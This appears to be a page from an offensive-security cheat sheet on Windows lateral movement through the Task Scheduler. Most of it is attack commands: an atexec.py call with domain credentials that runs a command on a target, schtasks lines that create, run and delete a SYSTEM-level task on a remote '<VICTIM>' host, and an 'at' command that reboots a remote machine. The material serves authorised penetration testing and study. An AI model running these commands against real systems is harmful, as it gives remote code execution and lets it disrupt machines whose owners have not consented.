ATExec / SchTaskExec

Administrator rights on the target machine are mandatory.

SchTasks is short for Scheduled Tasks and operates initially on port 135, then continues communication on an ephemeral port, using DCE/RPC for communication. Similar to creating a cron job in Linux, you can schedule a task to occur and execute whatever action you desire.

# Executes a command on the target machine via the Task Scheduler service and returns the output of the executed command.
atexec.py domain/user:password@IP <command>

schtasks /create /n <TASK_NAME> /tr C:\path\executable.exe /sc once /st 00:00 /S <VICTIM> /RU System
schtasks /run /tn <TASK_NAME> /S <VICTIM>
schtasks /F /delete /tn <TASK_NAME> /S <VICTIM>

At \\<IP> 11:00:00PM shutdown -r

References

PreviousWMIexec / WMI NextDCOMExec / DCOM

Last updated 1 year ago